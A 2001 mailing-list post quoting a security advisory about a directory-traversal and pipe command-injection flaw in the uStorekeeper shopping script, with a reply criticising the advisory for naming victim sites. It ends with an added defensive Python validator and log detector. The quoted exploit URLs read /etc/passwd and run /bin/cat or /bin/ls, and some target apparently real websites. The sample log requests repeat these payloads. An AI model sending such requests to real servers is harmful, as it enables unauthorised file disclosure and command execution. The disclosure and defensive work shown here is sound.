From: admincgisecurity.com
Date: Wed Apr 04 2001 - 12:35:06 CDT


    > ---=== UkR security team - Advisory ===---
    > uStorekeeper(tm) Online Shopping System - Runtime Script
    > - 'arbitrary file retrieval' vulnerability
    > Date: 03.04.2001
    > Problem: input validation error.
    > Vulnerable products: ustorekeeper.pl version 1.61 (probably others, but not tested)
    > Product vendor: Microburst Technologies / http://www.uburst.com
    > Comment: '..' and '/' are not filtered while processing user input, so it is possible to enter arbitrary values to retrieve files from the remote server which should not be accessible normally (for ex., /etc/passwd).

    The following advisory was actually found in December of 2000 by the staff
    at cgisecurity.com. No bugtraq post was published, on the other hand, because
    after speaking with the vendor they informed us that not every version
    was affected and that the newer versions of this product have been patched.
    A staff member of cgisecurity.com did make a proof of exploit for this code,
    but we gave few details of the vendor due to them asking us not
    to.

    Every so often when finding a new bug it will get posted publicly before
    you can even finish looking into its full details. This has been the case for
    about 5 advisories and we have scrapped them due to this. It is noted that UkR
    probably had no idea that this was a published known problem and that
    researching an exploit before releasing it is usually a good idea.
    (Try going to google and searching for it. You will find our semi
    advisory release pops up in this search.) We decided not to publish our
    exploit onto bugtraq because we are not about making the lives of kiddiots easier,
    but if you would like to check it out, follow the link from our main site.

    > Workaround:
    > Author: XblP /UkR security team (www.ukrteam.ru)/GiN group (www.gin.sh)
    > Greets
    > Exploit:
    > http://www.vulnurable.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../etc/hosts
    > http://www.vulnurable.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../bin/ls |
    > Example:
    > http://www.lynchs.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
    > http://www.madamealexanderdollmuseum.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../../../../bin/cat%20ustorekeeper.pl|

    Now is mentioning the victim websites really needed?
    Finding a hole is one thing but providing a url to click onto
    to exploit it is just stupid. Hopefully none of these admins
    find out and decide to sue you.
    (Everybody else keep checking attrition and see if this is the case)

    - zenomorph
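The advisory quoted above reduces to an input validation error: the `file` value of the `goto` command reaches the filesystem with '..', '/' and trailing '|' unfiltered. As an added example (not code from the thread, the vendor or either team), this Python shows the defender-side check a script like that would need, an allowlisted file name confined to a catalog directory, plus a helper that flags matching requests during an access-log review; CATALOG_ROOT, the sample hosts and the function names are assumptions.

```python
import os
import re
from urllib.parse import parse_qs, urlsplit

# Constructed catalog root standing in for the directory the shop script
# serves page files from; a placeholder, not the real product's layout.
CATALOG_ROOT = "/var/www/ustore/pages"

# Allowlist a plain file name: letters, digits, '_', '-' and one extension.
# Directory separators, '..', spaces and shell metacharacters such as '|'
# (appended in the advisory's URLs; a trailing '|' makes Perl's two-argument
# open() run the name as a command) can never match.
_SAFE_NAME = re.compile(r"[A-Za-z0-9_-]+(\.[A-Za-z0-9]+)?")


def resolve_catalog_file(file_param, root=CATALOG_ROOT):
    """Map the decoded 'file' parameter to a path under root, or None.

    Two independent checks: the allowlist on the name, then a containment
    check on the normalised result, so one slip alone cannot reopen traversal.
    """
    if not _SAFE_NAME.fullmatch(file_param):
        return None
    root_abs = os.path.abspath(root)
    candidate = os.path.normpath(os.path.join(root_abs, file_param))
    if os.path.commonpath([root_abs, candidate]) != root_abs:
        return None
    return candidate


def is_traversal_attempt(request_url):
    """Flag a ustorekeeper.pl 'goto' request whose file= value fails the check.

    Meant for a pass over access logs; parse_qs percent-decodes, so encoded
    and literal forms of '..' and '|' are judged alike.
    """
    parts = urlsplit(request_url)
    if not parts.path.endswith("/ustorekeeper.pl"):
        return False
    params = parse_qs(parts.query, keep_blank_values=True)
    if params.get("command") != ["goto"]:
        return False
    return any(resolve_catalog_file(v) is None for v in params.get("file", []))


# Constructed sample requests; hosts are placeholders, not real sites.
SAMPLE_REQUESTS = [
    "http://shop.example/cgi-bin/ustorekeeper.pl?command=goto&file=about.html",
    "http://shop.example/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../etc/passwd",
    "http://shop.example/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../bin/cat%20ustorekeeper.pl|",
]
```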